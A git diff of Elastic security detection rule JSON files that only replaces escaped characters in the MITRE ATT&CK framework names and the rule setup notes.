"tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json index 65d268c2321..75c640566d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_103.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json index b695d4c62d6..09cb2e56454 100644 --- a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_104.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json index 7db3e60f0bc..045c219a1aa 100644 --- a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_105.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json index e59fa1b801c..d1bb7e85a21 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json +++ b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json index 7e89d20e9d5..a02044d20f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c3167e1b-f73c-41be-b60b-87f4df707fe3_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json index 8cbe4e599a1..868509b1344 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_102.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json index 7d3add39f53..5a1b39dc8a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_103.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json index d6e7d0405fa..cc39ee043fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_104.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json index 04b2488fbad..a6e34aba7e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_105.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json index fa272229e09..d45e2929e48 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_102.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json index a5ff997c327..5806a984cd9 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_103.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json index e88f4786662..93c18d2aeaf 100644 --- a/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c3f5e1d8-910e-43b4-8d44-d748e498ca86_104.json @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json index ac7a148a9da..46c790e690b 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_104.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json index bd2a6e27387..2622397a402 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_105.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json index fa9eb57e27b..0bd31183d11 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_106.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json index 94180aedf56..94241206f8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_107.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json index bbea1f7c254..e7fe20b46d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_102.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json index 8ee83c7e03a..c2250477cc9 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_103.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json index 30e5021bcb9..18182880123 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_104.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json index f079e38500a..c812300ed8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_105.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json index b53f23c2f45..387925031fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json index ad8d87c85fa..41a207e669c 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json index 614144deaad..756ca167eaf 100644 --- a/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json +++ b/packages/security_detection_engine/kibana/security_rule/c4e9ed3e-55a2-4309-a012-bc3c78dad10a_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json index 8e808a717f1..70c8925a793 100644 --- a/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json index c9156346927..d886b267e4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_1.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -67,7 +67,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json index 6ddcae0a26b..125100a4f95 100644 --- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_103.json @@ -74,7 +74,7 @@ ], "risk_score": 73, "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json index a5c52f6a351..5e28a92b496 100644 --- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_104.json @@ -74,7 +74,7 @@ ], "risk_score": 73, "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json index 12da98219f7..4bed6b4e0c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_105.json @@ -74,7 +74,7 @@ ], "risk_score": 73, "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", 